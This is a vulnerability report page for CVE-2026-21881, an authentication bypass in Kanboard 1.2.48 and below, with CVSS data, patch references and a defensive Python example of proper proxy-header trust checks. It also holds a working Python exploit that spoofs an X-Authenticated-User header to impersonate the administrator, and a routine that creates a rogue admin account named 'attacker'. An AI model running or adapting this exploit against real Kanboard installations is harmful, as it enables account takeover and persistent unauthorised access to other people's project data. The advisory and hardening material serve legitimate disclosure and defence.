Security Vulnerability Report
CVE-2026-21881 CVSS 9.1 CRITICAL

Published: 2026-01-08 02:15:54
Last Modified: 2026-01-20 15:57:23

Description

Kanboard is project management software focused on the Kanban methodology. Versions 1.2.48 and below are vulnerable to a critical authentication bypass when REVERSE_PROXY_AUTH is enabled. The application blindly trusts HTTP headers for user authentication without verifying that the request originated from a trusted reverse proxy. An attacker can impersonate any user, including administrators, simply by sending a spoofed HTTP header. This issue is fixed in version 1.2.49.
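The failure the description names is a missing trust decision: a header that names the logged-in user is only meaningful if the application first confirms the connection came from its own reverse proxy. The added example below (not Kanboard's code; the WSGI environ keys, header name and proxy allowlist are assumptions chosen for illustration) shows the vulnerable pattern next to the hardened check.

```python
import ipaddress

# Added example (not Kanboard's code): the trust decision that a
# REVERSE_PROXY_AUTH-style feature must make before accepting a user
# name from an HTTP header. The environ keys, header name and proxy
# allowlist below are assumptions for illustration.

TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.0/8")]  # constructed allowlist
USER_HEADER = "HTTP_X_AUTHENTICATED_USER"  # WSGI form of the assumed header


def user_from_header_vulnerable(environ):
    """Vulnerable pattern: whatever the header says is the logged-in user."""
    return environ.get(USER_HEADER) or None


def user_from_header_hardened(environ):
    """Accept the header only when the TCP peer is a trusted proxy.

    REMOTE_ADDR is the socket peer as seen by the app server; unlike
    X-Forwarded-For or X-Real-IP it is not a header and cannot be set
    by the client, so it is the value the trust decision must rest on.
    """
    peer = environ.get("REMOTE_ADDR", "")
    try:
        peer_ip = ipaddress.ip_address(peer)
    except ValueError:
        return None  # no usable peer address: never trust the header
    if not any(peer_ip in net for net in TRUSTED_PROXIES):
        return None  # direct client: header is attacker-controlled, ignore it
    user = environ.get(USER_HEADER, "").strip()
    return user or None


# Constructed requests: a spoofed header arriving directly from the internet
# (with a spoofed X-Forwarded-For), and a header set by the trusted proxy.
SPOOFED = {"REMOTE_ADDR": "203.0.113.7", USER_HEADER: "admin",
           "HTTP_X_FORWARDED_FOR": "127.0.0.1"}
VIA_PROXY = {"REMOTE_ADDR": "10.0.0.5", USER_HEADER: "alice"}

if __name__ == "__main__":
    for name, env in (("spoofed", SPOOFED), ("via_proxy", VIA_PROXY)):
        print(name, "vulnerable ->", user_from_header_vulnerable(env),
              "hardened ->", user_from_header_hardened(env))
```

The peer check is necessary but not sufficient: the proxy must also overwrite or strip the user header on every inbound request, otherwise a client behind the proxy can still inject it, and the application server should not be reachable except through the proxy.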

CVSS Details

CVSS Score: 9.1
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:kanboard:kanboard:*:*:*:*:*:*:*:* - VULNERABLE
Kanboard < 1.2.49 (i.e. 1.2.48 and below)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python

import requests

# CVE-2026-21881 PoC - Kanboard Authentication Bypass
# Target: Kanboard with REVERSE_PROXY_AUTH enabled
# This PoC demonstrates how an attacker can impersonate any user

TARGET_URL = "http://target-kanboard.com/"
TARGET_USER = "admin"  # Can be any user including admin


def exploit_auth_bypass():
    """
    Exploit the authentication bypass by sending a crafted HTTP header
    to impersonate a user without knowing their credentials.
    """
    headers = {
        # Key header that triggers the vulnerability
        # Kanboard uses this header when REVERSE_PROXY_AUTH is enabled
        "X-Authenticated-User": TARGET_USER,
        # Additional headers that may be checked
        "X-Forwarded-For": "127.0.0.1",  # Spoof trusted IP
        "X-Real-IP": "127.0.0.1",
        "User-Agent": "Mozilla/5.0",
    }

    # Try to access protected resources
    session = requests.Session()

    # Access the dashboard or API endpoints
    endpoints = [
        "?controller=DashboardController&action=show",
        "?controller=UserViewController&action=show&user_id=1",
        "?controller=ConfigController&action=index",
    ]

    for endpoint in endpoints:
        try:
            response = session.get(TARGET_URL + endpoint, headers=headers, timeout=10)
            print(f"[*] Request to {endpoint}")
            print(f"[*] Status Code: {response.status_code}")

            # Check if we successfully impersonated the user
            if "admin" in response.text.lower() or response.status_code == 200:
                print("[+] Authentication bypass successful!")
                print("[+] User impersonation confirmed")
                return True
        except requests.RequestException as e:
            print(f"[-] Request failed: {e}")

    return False


def create_admin_poc():
    """
    Alternative: Direct API call to create a new admin user
    Requires the authentication bypass to work first
    """
    headers = {
        "X-Authenticated-User": "admin",
        "Content-Type": "application/json",
    }
    payload = {
        "controller": "UserCreationController",
        "action": "save",
        "username": "attacker",
        "password": "Attacker123!",
        "role": "admin",
    }
    response = requests.post(TARGET_URL, headers=headers, data=payload)
    return response.status_code == 200


if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2026-21881 - Kanboard Authentication Bypass Exploit")
    print("=" * 60)
    exploit_auth_bypass()

Weakness

CWE-287 (Improper Authentication)

References

Patch commit: https://github.com/kanboard/kanboard/commit/7af6143e2ad25b5c15549cca8af4341c7ac4e2fc
Release notes (v1.2.49): https://github.com/kanboard/kanboard/releases/tag/v1.2.49
Vendor advisory (GHSA-wwpf-3j4p-739w, tagged Exploit / Vendor Advisory): https://github.com/kanboard/kanboard/security/advisories/GHSA-wwpf-3j4p-739w

NVD record status: Analyzed. CPE match criteria ID: AFA1D972-E76A-4A20-95F5-68D9915D3797 (versionEndExcluding 1.2.49).